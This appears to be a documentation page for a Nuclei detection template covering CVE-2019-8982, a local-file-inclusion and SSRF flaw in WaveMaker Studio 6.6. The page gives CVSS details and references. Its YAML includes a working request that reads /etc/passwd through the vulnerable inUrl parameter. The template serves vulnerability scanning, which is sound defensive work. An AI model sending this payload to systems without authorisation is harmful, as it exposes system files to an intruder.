Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
ID: CVE-2019-8982
Severity: critical
Author: madrobot
Tags: cve,cve2019,wavemaker,lfi,ssrf,edb
Description
Section titled “Description”WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.
YAML Source
Section titled “YAML Source”id: CVE-2019-8982
info: name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery author: madrobot severity: critical description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery." impact: | Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive files and potential server-side request forgery attacks. remediation: | Apply the latest security patches and updates provided by Wavemaker Studio to mitigate these vulnerabilities. reference: - https://www.exploit-db.com/exploits/45158 - https://nvd.nist.gov/vuln/detail/CVE-2019-8982 - https://github.com/merlinepedra25/nuclei-templates - https://github.com/sobinge/nuclei-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2019-8982 cwe-id: CWE-918 epss-score: 0.01814 epss-percentile: 0.88158 cpe: cpe:2.3:a:wavemaker:wavemarker_studio:6.6:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wavemaker product: wavemarker_studio tags: cve,cve2019,wavemaker,lfi,ssrf,edb
http: - method: GET path: - "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a00463044022033dc113155d6a35f074008910180790376800b16af33fe63e4cc97c98efffd64022014f9b373b5a484eca47ecc01b4b21233c3064527af3bed37686806aaef8e9c4b:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8982.yaml"